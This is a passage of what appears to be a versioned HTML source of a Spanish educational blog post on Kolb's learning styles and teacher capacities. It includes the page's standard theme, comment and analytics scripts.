grupo genere un aprendizaje significativo. Para esto imprescindible el proponer actividades direccionadas a sus estilos de aprendizaje, por ello, se revisar\u00e1 algunas de ellas con sus caracter\u00edsticas.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p><span class=\"image\"><img src=\"https:\/\/s20.postimg.org\/bt67sp50t\/estilos4.png\" alt=\"Estilos de aprendizaje\"><\/span><\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Refiri\u00e9ndose al tema Laura Frade, articula ocho capacidades que deben tener los docentes, estas capacidades interact\u00faan entre s\u00ed para dar como resultado la \u00f3ptima formaci\u00f3n de los estudiantes:<\/p>\n<\/div>\n<div class=\"olist arabic\">\n<ol class=\"arabic\">\n<li>\n<p>Capacidad diagn\u00f3stica: capacidad de detectar las necesidades de aprendizaje del estudiante, alienearla a un estilo de aprendizaje y vincularla con una estrategia de aprendizaje.<\/p>\n<\/li>\n<li>\n<p>Capacidad cognitiva: capacidad que guarda relaci\u00f3n con la adquisici\u00f3n del conocimiento necesario para impartir los contenidos tem\u00e1ticos.<\/p>\n<\/li>\n<li>\n<p>Capacidad \u00e9tica: capacidad que incide en la toma de decisiones del docente sobre su compromiso ante la sociedad, la responsabilidad de trabajo, los valores que promover\u00e1, los juicios de valor que emitir\u00e1, la priorizaci\u00f3n del desarrollo de los estudiantes, la preocupaci\u00f3n sobre su futuro laboral.<\/p>\n<\/li>\n<li>\n<p>Capacidad l\u00f3gica: capacidad para organizar el contenido tem\u00e1ticos de forma l\u00f3gica-secuencial. Se demuestra por su, orden, graduaci\u00f3n y dosificaci\u00f3n.<\/p>\n<\/li>\n<li>\n<p>Capacidad emp\u00e1tica: capacidad que permite entender a los estudiantes en tres diferentes planos: afectivo, cognitivo y psicomotriz.<\/p>\n<\/li>\n<li>\n<p>Capacidad comunicativa: habilidad para lograr la mediaci\u00f3n entre el aprendizaje y la ense\u00f1anza.Se evidencia en el uso de los diferentes tipos de lenguaje que posibiliten al estudiante apropiarse del conocimiento y hacer su propia construcci\u00f3n significativa, lo que les permitir\u00e1 aprender para la vida.<\/p>\n<\/li>\n<li>\n<p>Capacidad l\u00fadica: capacidad que permite dise\u00f1ar y aplicar diversas estrategias de ense\u00f1anza-aprendizaje.<\/p>\n<\/li>\n<li>\n<p>Capacidad metacognitiva: capacidad para evaluar el proceso ense\u00f1anza-aprendizaje en dos v\u00edas: hacia los alumnos verificando avances y estableciendo medidas correctivas, pero adem\u00e1s hacia su propio desempe\u00f1o como docente, lo que le permitir\u00e1 mejorar d\u00eda a d\u00eda en su profesi\u00f3n.<\/p>\n<\/li>\n<\/ol>\n<\/div>\n<div class=\"paragraph\">\n<p>Si nosotros como docentes contamos con estas habilidades, aseguraremos un buen trabajo con nuestros estudiantes.<\/p>\n<\/div>\n<div class=\"sect2\">\n<h3 id=\"__qu_son\">\u00bfQu\u00e9 son?<\/h3>\n<div class=\"paragraph\">\n<p>Se definen como las distintas maneras en que un individuo puede aprender; para Alonso y Gallego (1994) los estilos de aprendizaje son los rasgos cognitivos, afectivos y fisiol\u00f3gicos que sirven como indicadores relativamente estables de c\u00f3mo los alumnos perciben interacciones y responden a sus ambientes de aprendizaje.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Se cree que todas las personas emplean un m\u00e9todo particular de interacci\u00f3n, aceptaci\u00f3n y procesado de est\u00edmulos e informaci\u00f3n. 
Las caracter\u00edsticas sobre estilo de aprendizaje suelen formar parte de cualquier informe psicopedag\u00f3gico que se elabore sobre un estudiante, y debiera ser el fundamento de las estrategias did\u00e1cticas y refuerzos pedag\u00f3gicos para que estos sean los m\u00e1s adecuados para el alumno.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Los diversos investigadores que han propuesto alg\u00fan estilo de aprendizaje en cierto difieren de los componentes de los estilos de aprendizaje; sin embargo estos ser\u00edan algunos de los m\u00e1s empleados:<\/p>\n<\/div>\n<div class=\"ulist\">\n<ul>\n<li>\n<p>Condiciones ambientales<\/p>\n<\/li>\n<li>\n<p>Bagaje cultural<\/p>\n<\/li>\n<li>\n<p>Edad<\/p>\n<\/li>\n<li>\n<p>Preferencias de agrupamiento (se refiere a si se trabaja mejor individual-\nmente o en equipo)<\/p>\n<\/li>\n<li>\n<p>Estilo seguido para la resoluci\u00f3n de problemas<\/p>\n<\/li>\n<li>\n<p>Tipo de motivaci\u00f3n, locus de control interno o externo<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<div class=\"paragraph\">\n<p>El analizar los diferentes estilos de aprendizjae que tienen nuestros estudiantes sin lugar a dudas permitir\u00e1 que podamos tomar decisiones dirigidas a satisfacer cada necesidad singular en el grupo y con ellos que el conjunto de estudiantes logre la asimilizaci\u00f3n de conocimientos planificiada o quiz\u00e1s una superior.<\/p>\n<\/div>\n<\/div>\n<div class=\"sect2\">\n<h3 id=\"_clasificaci_n\">Clasificaci\u00f3n<\/h3>\n<div class=\"paragraph\">\n<p>Los modelos existentes sobre estilos de aprendizaje ofrecen un marco conceptual para entender los comportamientos observados en el aula, los cuales brindan una\nexplicaci\u00f3n sobre la relaci\u00f3n de esos comportamientos con la forma en que est\u00e1n aprendiendo los alumnos y el tipo de estrategias de ense\u00f1anza que pueden resultar m\u00e1s eficaces en un momento determinado, ya sea por el contendido tem\u00e1tico en s\u00ed, o bien por las diversas interacciones sociales que se desarrollan en el aula.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>De esta manera tenemos varias clasificaciones las cuales se muestran en la siguiente tabla:<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p><span class=\"image\"><img src=\"https:\/\/s20.postimg.org\/6t8rkqze5\/estilos1.png\" alt=\"Calsificaci\u00f3n estilos de apredizaje\" width=\"800\" height=\"400 role=right\"><\/span><\/p>\n<\/div>\n<\/div>\n<div class=\"sect2\">\n<h3 id=\"_modelo_de_kolb\">Modelo de Kolb<\/h3>\n<div class=\"paragraph\">\n<p>El aprendizaje experiencial progresa a trav\u00e9s de un ciclo de actividades a las que se conoce habitualmente como ciclo de aprendizaje de Kolb (David Kolb, 1984).<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>El ciclo tiene cuatro componentes, cada uno de los cuales plantea retos concretos a la hora de planificar actividades acad\u00e9micas.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p><span class=\"image\"><img src=\"http:\/\/image.slidesharecdn.com\/estilos-de-aprendizaje-k-o-l-b2165\/95\/estilos-de-aprendizaje-k-o-l-b-5-728.jpg \" alt=\"ciclos modelo kolb\"><\/span><\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Acorde este modelo una persona sulee establecer su estilo de aprendizaje en 1 o m\u00e1ximo 2 de estas fases y de esta menera podemos clasificar a nuestros estudiantes acorde la fase que prefieran trabajar.<\/p>\n<\/div>\n<div class=\"ulist\">\n<ul>\n<li>\n<p>Activo<\/p>\n<\/li>\n<li>\n<p>Reflexivo<\/p>\n<\/li>\n<li>\n<p>Te\u00f3rico<\/p>\n<\/li>\n<li>\n<p>Pragm\u00e1tico<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<div 
class=\"sect2\">\n<h3 id=\"_car_ter_sticas_de_cada_estilo\">Car\u00e1ter\u00edsticas de cada estilo<\/h3>\n<div class=\"paragraph\">\n<p>Para lograr proponer\/emplear estrategias de aprendizaje apropiadas para cada estilo revisemos las caracter\u00edsticas de cada uno:<\/p>\n<\/div>\n<table class=\"tableblock frame-all grid-all\">\n<caption class=\"title\">Table 1. Caracter\u00edsticas Estilos de parendizaje modelo Kolb<\/caption>\n<colgroup>\n<col>\n<col>\n<col>\n<col>\n<\/colgroup>\n<thead>\n<tr>\n<th class=\"tableblock halign-left valign-top\">Estilo<\/th>\n<th class=\"tableblock halign-left valign-top\">Caracter\u00edstica General<\/th>\n<th class=\"tableblock halign-left valign-top\">Cuando facilita el aprendizaje<\/th>\n<th class=\"tableblock halign-left valign-top\">Cuando NO facilita el aprendizaje.<\/th>\n<\/tr>\n<\/thead>\n<tfoot>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Pr\u00e1gm\u00e1ticos<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Gustan de poner en pr\u00e1ctica las ideas, teor\u00edas, t\u00e9cnicas nuevas y verificar su funcionamiento, forma de uso\/aplicaci\u00f3n. Generan\/buscan ideas y las ejecutan inmediatamente. Se basan en la realidad para plantear alternativas a fin de de tomar decisiones sobre algo. Buscan desaf\u00edos, replantear algo con una diferente perspectiva. Discuten un tema brevemenete, les aburren los debates largos. <strong>La pregunta que quieren responder es: <em>\u00bfQu\u00e9 pasar\u00eda si?<\/em><\/strong><\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Actividades que enlacen la teor\u00eda con la pr\u00e1ctica. Visualizan trabajo\/movimiento\/acci\u00f3n. Posibilidad de aplicaci\u00f3n de algo aprendido.<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Cuando todo queda en teor\u00eda. Lo aprendido no se vincula con la realidad o necesidades puntuales. Actividades que no se identifique una finalidad con claridad.<\/p><\/td>\n<\/tr>\n<\/tfoot>\n<tbody>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Activos<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Se involucran totalmente y sin prejuicios en las experiencias nuevas.\nDisfrutan el momento y cada acontecimiiento. Entusiastas ente lo nuevo. Actuan primero y luego piensan en las consecuencias. Disfrutan trabajando en equipo siendo el eje del grupo. Les aburre planificar a largo plazo y consolidar poryectos.\n<strong>La pregunta que buscan responder en el aprendizaje es: <em>\u00bfC\u00f3mo?<\/em><\/strong><\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Plantendo actividades desafiantes . Actividades de resultados immediatos o a corto plazo. Actividades activas de emoci\u00f3n, drama, acci\u00f3n.<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Siendo pasivos. Demasiado an\u00e1lisis de un tema o mucha reflexi\u00f3n sobre algo. Trabajo individual.<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Reflexivo<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Adoptan una postura observadora de an\u00e1lsis en base a datos, experiencias desde varias perpectivas.Establecen conclusiones en base a argumentos s\u00f3lidos y convincentes. 
Son precavidos y analizan todas las implicaciones de cualquier acci\u00f3n antes de ponerse en\nmovimiento. En las reuniones observan y escuchan antes de hablar procurando pasar desapercibidos. <strong>La pregunta que quieren responder con el aprendizaje es: <em>\u00bfPor qu\u00e9?<\/em><\/strong><\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Cuando pueden tener una postura de observador. Analizar situaciones. Se les facilita informaci\u00f3n o datos. Tienen tiempo para reflexionar antes de actuar.<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Se exigen ser centro o eje de atenci\u00f3n. Actividades de soluci\u00f3n inmediata. Improvisaci\u00f3n sobre algo. Actividades que le apresuren.<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Te\u00f3ricos<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Adaptan e intergran las teor\u00edas o fundamentos de forma l\u00f3gica. Organizan las cosas de forma secuencial, integrada y coherente. Analizan y sintetizan informaci\u00f3n de forma racional. No son subjetivos ni il\u00f3gicos. <strong>La pregutna que quieren responder es: <em>\u00bfQu\u00e9?<\/em><\/strong><\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Cuando se parte de teor\u00edas, modelos, sistemas. Ideas o conceptos desafiantes. Actividades que propicien la indagaci\u00f3n o cuestionamientos.<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Actividades abiguas o que generen incertidumbre. Actividades\/situaciones que prioricen sentimientos o emociones. Cuando no se les facilita la teor\u00eda o bases conceptuales.<\/p><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<div class=\"admonitionblock note\">\n<table>\n<tr>\n<td class=\"icon\">\n<i class=\"fa icon-note\" title=\"Note\"><\/i>\n<\/td>\n<td class=\"content\">\nEste valor de 3274 d\u00f3lares es el cambio del euro (3000) a dolar.\n<\/td>\n<\/tr>\n<\/table>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n <\/section>\n\n <\/article>\n\n \n <section class=\"post-comments\">\n <div id=\"disqus_thread\"><\/div>\n <script type=\"text\/javascript\">\n var disqus_shortname = 'marchelo2212'; \/\/ required: replace example with your forum shortname\n \/* * * DON'T EDIT BELOW THIS LINE * * *\/\n (function() {\n var dsq = document.createElement('script'); dsq.type = 'text\/javascript'; dsq.async = true;\n dsq.src = '\/\/' + disqus_shortname + '.disqus.com\/embed.js';\n (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);\n })();\n <\/script>\n <noscript>Please enable JavaScript to view the <a href=\"http:\/\/disqus.com\/?ref_noscript\">comments powered by Disqus.<\/a><\/noscript>\n <a href=\"http:\/\/disqus.com\" class=\"dsq-brlink\">comments powered by <span class=\"logo-disqus\">Disqus<\/span><\/a>\n <\/section>\n \n\n\n\n <footer class=\"footer\">\n <span class=\"footer__copyright\">© 2016. 
All rights reserved.<\/span>\n <span class=\"footer__copyright\"><a href=\"http:\/\/uno.daleanthony.com\" title=\"link to page for Uno Ghost theme\">Uno theme<\/a> by <a href=\"http:\/\/daleanthony.com\" title=\"link to website for Dale-Anthony\">Dale-Anthony<\/a><\/span>\n <span class=\"footer__copyright\">Proudly published with <a href=\"http:\/\/hubpress.io\" title=\"link to Hubpress website\">Hubpress<\/a><\/span>\n <\/footer>\n <\/div>\n <\/div>\n\n <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/jquery\/2.1.3\/jquery.min.js?v=\"><\/script> <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/moment.js\/2.9.0\/moment-with-locales.min.js?v=\"><\/script> <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/8.4\/highlight.min.js?v=\"><\/script> \n <script type=\"text\/javascript\">\n jQuery( document ).ready(function() {\n \/\/ change date with ago\n jQuery('ago.ago').each(function(){\n var element = jQuery(this).parent();\n element.html( moment(element.text()).fromNow());\n });\n });\n\n hljs.initHighlightingOnLoad(); \n <\/script>\n\n <script type=\"text\/javascript\" src=\"\/\/marchelo2212.github.io\/themes\/uno\/assets\/js\/main.js?v=1.0.0\"><\/script>\n \n <script>\n (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){\n (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\n m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\n })(window,document,'script','\/\/www.google-analytics.com\/analytics.js','ga');\n\n ga('create', 'UA-70778105-1', 'auto');\n ga('send', 'pageview');\n\n <\/script>\n\n<\/body>\n<\/html>\n","old_contents":"<!DOCTYPE html>\n<html>\n<head>\n <meta charset=\"utf-8\" \/>\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" \/>\n\n <title>Los estilos de aprendizaje de Kolb - Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..<\/title>\n\n <meta name=\"HandheldFriendly\" content=\"True\">\n <meta name=\"MobileOptimized\" content=\"320\">\n <meta name=\"apple-mobile-web-app-capable\" content=\"yes\">\n <meta name=\"apple-mobile-web-app-status-bar-style\" content=\"black-translucent\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, maximum-scale=1\">\n\n <meta name=\"description\" content=\"\">\n\n <meta name=\"twitter:card\" content=\"summary\">\n <meta name=\"twitter:title\" content=\"Los estilos de aprendizaje de Kolb\">\n <meta name=\"twitter:description\" content=\"\">\n\n <meta property=\"og:type\" content=\"article\">\n <meta property=\"og:title\" content=\"Los estilos de aprendizaje de Kolb\">\n <meta property=\"og:description\" content=\"\">\n\n <link href=\"\/favicon.ico\" rel=\"shortcut icon\" type=\"image\/x-icon\">\n <link href=\"\/apple-touch-icon-precomposed.png\" rel=\"apple-touch-icon\">\n\n <link rel=\"stylesheet\" type=\"text\/css\" href=\"\/\/marchelo2212.github.io\/themes\/uno\/assets\/css\/uno.css?v=1.0.0\" \/>\n\n <link rel=\"canonical\" href=\"https:\/\/marchelo2212.github.io17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc\" \/>\n \n <meta property=\"og:site_name\" content=\"Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\" \/>\n <meta property=\"og:type\" content=\"article\" \/>\n <meta property=\"og:title\" content=\"Los estilos de aprendizaje de Kolb\" \/>\n <meta property=\"og:description\" content=\"Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un 
mejor aprendizaje en cada uno...\" \/>\n <meta property=\"og:url\" content=\"https:\/\/marchelo2212.github.io17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc\" \/>\n <meta property=\"article:published_time\" content=\"Invalid date\" \/>\n <meta property=\"article:modified_time\" content=\"2016-07-30T17:54:22.733Z\" \/>\n <meta property=\"article:tag\" content=\"e-learning\" \/>\n <meta property=\"article:tag\" content=\"innovaci\u00f3n\" \/>\n <meta property=\"article:tag\" content=\"estilos de aprendizaje\" \/>\n <meta property=\"article:tag\" content=\"TIC\" \/>\n <meta property=\"article:tag\" content=\"educaci\u00f3n\" \/>\n \n <meta name=\"twitter:card\" content=\"summary\" \/>\n <meta name=\"twitter:title\" content=\"Los estilos de aprendizaje de Kolb\" \/>\n <meta name=\"twitter:description\" content=\"Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno...\" \/>\n <meta name=\"twitter:url\" content=\"https:\/\/marchelo2212.github.io17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc\" \/>\n \n <script type=\"application\/ld+json\">\n{\n \"@context\": \"http:\/\/schema.org\",\n \"@type\": \"Article\",\n \"publisher\": \"Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\",\n \"author\": {\n \"@type\": \"Person\",\n \"name\": \"Marcelo Sotaminga\",\n \"image\": \"https:\/\/avatars.githubusercontent.com\/u\/9286299?v=3\",\n \"url\": \"undefined\/author\/undefined\",\n \"sameAs\": null\n },\n \"headline\": \"Los estilos de aprendizaje de Kolb\",\n \"url\": \"https:\/\/marchelo2212.github.io17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc\",\n \"datePublished\": \"Invalid date\",\n \"dateModified\": \"2016-07-30T17:54:22.733Z\",\n \"keywords\": \"e-learning, innovaci\u00f3n, estilos de aprendizaje, TIC, educaci\u00f3n\",\n \"description\": \"Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno...\"\n}\n <\/script>\n\n <meta name=\"generator\" content=\"Ghost ?\" \/>\n <link rel=\"alternate\" type=\"application\/rss+xml\" title=\"Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\" href=\"https:\/\/marchelo2212.github.io\/rss\" \/>\n <link rel=\"stylesheet\" href=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/8.4\/styles\/default.min.css\">\n\n<\/head>\n<body class=\"post-template tag-e-learning tag-innovacion tag-estilos-de-aprendizaje tag-TIC tag-educacion no-js\">\n\n <span class=\"mobile btn-mobile-menu\">\n <i class=\"icon icon-list btn-mobile-menu__icon\"><\/i>\n <i class=\"icon icon-x-circle btn-mobile-close__icon hidden\"><\/i>\n <\/span>\n\n <header class=\"panel-cover panel-cover--collapsed \" >\n <div class=\"panel-main\">\n \n <div class=\"panel-main__inner panel-inverted\">\n <div class=\"panel-main__content\">\n \n <h1 class=\"panel-cover__title panel-title\"><a href=\"https:\/\/marchelo2212.github.io\" title=\"link to homepage for Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\">Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..<\/a><\/h1>\n <hr class=\"panel-cover__divider\" \/>\n <p class=\"panel-cover__description\">Sitio dedicado a recopilar las cosas que he realizado en algunos lados, para poder tenerlas todas un poco ordenadas, aqu\u00ed encontrar\u00e1s cosas referente a:\n 
Software Libre - GNU \/ Linux\n Innovaci\u00f3n Educativa\n Ciencia y Tecnolog\u00eda\n Entre otras....\n <\/p>\n <hr class=\"panel-cover__divider panel-cover__divider--secondary\" \/>\n \n <div class=\"navigation-wrapper\">\n \n <nav class=\"cover-navigation cover-navigation--primary\">\n <ul class=\"navigation\">\n <li class=\"navigation__item\"><a href=\"https:\/\/marchelo2212.github.io\/#blog\" title=\"link to Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s.. blog\" class=\"blog-button\">Blog<\/a><\/li>\n <\/ul>\n <\/nav>\n \n \n \n <nav class=\"cover-navigation navigation--social\">\n <ul class=\"navigation\">\n \n <!-- Twitter -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/www.facebook.com\/marchelo2212\" title=\"Facebook account\">\n <i class='icon icon-social-facebook'><\/i>\n <span class=\"label\">Facebook<\/span>\n <\/a>\n <\/li>\n \n <!-- Twitter -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/twitter.com\/Marchelo2212\" title=\"Twitter account\">\n <i class='icon icon-social-twitter'><\/i>\n <span class=\"label\">Twitter<\/span>\n <\/a>\n <\/li>\n \n <!-- Google Plus -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/plus.google.com\/u\/0\/+MarceloSotaminga\" title=\"Google+ account\">\n <i class='icon icon-social-google-plus'><\/i>\n <span class=\"label\">Google-plus<\/span>\n <\/a>\n <\/li>\n \n \n \n \n \n <!-- LinkedIn -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/ec.linkedin.com\/in\/marcelo-sotaminga-9ab64562\" title=\"LinkedIn account\">\n <i class='icon icon-social-linkedin'><\/i>\n <span class=\"label\">LinkedIn<\/span>\n <\/a>\n <\/li>\n \n <!-- Email -->\n <li class=\"navigation__item\">\n <a href=\"mailto:marcelo@openmailbox.org\" title=\"Email marcelo@openmailbox.org\">\n <i class='icon icon-mail'><\/i>\n <span class=\"label\">Email<\/span>\n <\/a>\n <\/li>\n \n <\/ul>\n <\/nav>\n \n \n <\/div>\n \n <\/div>\n \n <\/div>\n \n <div class=\"panel-cover--overlay\"><\/div>\n <\/div>\n <\/header>\n\n <div class=\"content-wrapper\">\n <div class=\"content-wrapper__inner\">\n \n\n <article class=\"post-container post-container--single\">\n\n <header class=\"post-header\">\n <div class=\"post-meta\">\n <time datetime=\"Invalid date\" class=\"post-meta__date date\">Invalid date<\/time> • <span class=\"post-meta__tags tags\">on <a href=\"https:\/\/marchelo2212.github.io\/tag\/e-learning\">e-learning<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/innovacion\"> innovaci\u00f3n<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/estilos-de-aprendizaje\"> estilos de aprendizaje<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/TIC\">TIC<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/educacion\"> educaci\u00f3n<\/a><\/span>\n <span class=\"post-meta__author author\"><img src=\"https:\/\/avatars.githubusercontent.com\/u\/9286299?v=3\" alt=\"profile image for Marcelo Sotaminga\" class=\"avatar post-meta__avatar\" \/> by Marcelo Sotaminga<\/span>\n <\/div>\n <h1 class=\"post-title\">Los estilos de aprendizaje de Kolb<\/h1>\n <\/header>\n\n <section class=\"post tag-e-learning tag-innovacion tag-estilos-de-aprendizaje tag-TIC tag-educacion\">\n <div id=\"preamble\">\n<div class=\"sectionbody\">\n<div class=\"paragraph\">\n<p>Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno de ellos y responder a la diversidad de 
caracter\u00edsticas de los mismos.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"sect1\">\n<h2 id=\"_estilos_de_aprendizaje\">Estilos de aprendizaje<\/h2>\n<div class=\"sectionbody\">\n<div class=\"paragraph\">\n<p>El emplear metodolog\u00edas que apunten a mantener como eje central al estudiante deber\u00e1 tomar en cuenta la heterogeneidad del grupo y trabajar (planificando y aplicando) diversas estrategias did\u00e1cticas que permitan justamente que todo el grupo genere un aprendizaje significativo. Para esto es imprescindible proponer actividades direccionadas a sus estilos de aprendizaje; por ello, se revisar\u00e1n algunas de ellas con sus caracter\u00edsticas.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p><span class=\"image\"><img src=\"https:\/\/s20.postimg.org\/bt67sp50t\/estilos4.png\" alt=\"Estilos de aprendizaje\"><\/span><\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Refiri\u00e9ndose al tema, Laura Frade articula ocho capacidades que deben tener los docentes; estas capacidades interact\u00faan entre s\u00ed para dar como resultado la \u00f3ptima formaci\u00f3n de los estudiantes:<\/p>\n<\/div>\n<div class=\"olist arabic\">\n<ol class=\"arabic\">\n<li>\n<p>Capacidad diagn\u00f3stica: capacidad de detectar las necesidades de aprendizaje del estudiante, alinearla a un estilo de aprendizaje y vincularla con una estrategia de aprendizaje.<\/p>\n<\/li>\n<li>\n<p>Capacidad cognitiva: capacidad que guarda relaci\u00f3n con la adquisici\u00f3n del conocimiento necesario para impartir los contenidos tem\u00e1ticos.<\/p>\n<\/li>\n<li>\n<p>Capacidad \u00e9tica: capacidad que incide en la toma de decisiones del docente sobre su compromiso ante la sociedad, la responsabilidad de trabajo, los valores que promover\u00e1, los juicios de valor que emitir\u00e1, la priorizaci\u00f3n del desarrollo de los estudiantes, la preocupaci\u00f3n sobre su futuro laboral.<\/p>\n<\/li>\n<li>\n<p>Capacidad l\u00f3gica: capacidad para organizar el contenido tem\u00e1tico de forma l\u00f3gica-secuencial. 
Se demuestra por su orden, graduaci\u00f3n y dosificaci\u00f3n.<\/p>\n<\/li>\n<li>\n<p>Capacidad emp\u00e1tica: capacidad que permite entender a los estudiantes en tres diferentes planos: afectivo, cognitivo y psicomotriz.<\/p>\n<\/li>\n<li>\n<p>Capacidad comunicativa: habilidad para lograr la mediaci\u00f3n entre el aprendizaje y la ense\u00f1anza. Se evidencia en el uso de los diferentes tipos de lenguaje que posibiliten al estudiante apropiarse del conocimiento y hacer su propia construcci\u00f3n significativa, lo que les permitir\u00e1 aprender para la vida.<\/p>\n<\/li>\n<li>\n<p>Capacidad l\u00fadica: capacidad que permite dise\u00f1ar y aplicar diversas estrategias de ense\u00f1anza-aprendizaje.<\/p>\n<\/li>\n<li>\n<p>Capacidad metacognitiva: capacidad para evaluar el proceso ense\u00f1anza-aprendizaje en dos v\u00edas: hacia los alumnos, verificando avances y estableciendo medidas correctivas, pero adem\u00e1s hacia su propio desempe\u00f1o como docente, lo que le permitir\u00e1 mejorar d\u00eda a d\u00eda en su profesi\u00f3n.<\/p>\n<\/li>\n<\/ol>\n<\/div>\n<div class=\"paragraph\">\n<p>Si nosotros como docentes contamos con estas habilidades, aseguraremos un buen trabajo con nuestros estudiantes.<\/p>\n<\/div>\n<div class=\"sect2\">\n<h3 id=\"__qu_son\">\u00bfQu\u00e9 son?<\/h3>\n<div class=\"paragraph\">\n<p>Se definen como las distintas maneras en que un individuo puede aprender; para Alonso y Gallego (1994) los estilos de aprendizaje son los rasgos cognitivos, afectivos y fisiol\u00f3gicos que sirven como indicadores relativamente estables de c\u00f3mo los alumnos perciben, interaccionan y responden a sus ambientes de aprendizaje.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Se cree que todas las personas emplean un m\u00e9todo particular de interacci\u00f3n, aceptaci\u00f3n y procesado de est\u00edmulos e informaci\u00f3n. 
Las caracter\u00edsticas sobre estilo de aprendizaje suelen formar parte de cualquier informe psicopedag\u00f3gico que se elabore sobre un estudiante, y debieran ser el fundamento de las estrategias did\u00e1cticas y refuerzos pedag\u00f3gicos para que estos sean los m\u00e1s adecuados para el alumno.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Los diversos investigadores que han propuesto alg\u00fan estilo de aprendizaje difieren en cierto modo en los componentes de los estilos de aprendizaje; sin embargo, estos ser\u00edan algunos de los m\u00e1s empleados:<\/p>\n<\/div>\n<div class=\"ulist\">\n<ul>\n<li>\n<p>Condiciones ambientales<\/p>\n<\/li>\n<li>\n<p>Bagaje cultural<\/p>\n<\/li>\n<li>\n<p>Edad<\/p>\n<\/li>\n<li>\n<p>Preferencias de agrupamiento (se refiere a si se trabaja mejor individualmente o en equipo)<\/p>\n<\/li>\n<li>\n<p>Estilo seguido para la resoluci\u00f3n de problemas<\/p>\n<\/li>\n<li>\n<p>Tipo de motivaci\u00f3n, locus de control interno o externo<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<div class=\"paragraph\">\n<p>El analizar los diferentes estilos de aprendizaje que tienen nuestros estudiantes sin lugar a dudas permitir\u00e1 que podamos tomar decisiones dirigidas a satisfacer cada necesidad singular en el grupo y, con ello, que el conjunto de estudiantes logre la asimilaci\u00f3n de conocimientos planificada o quiz\u00e1s una 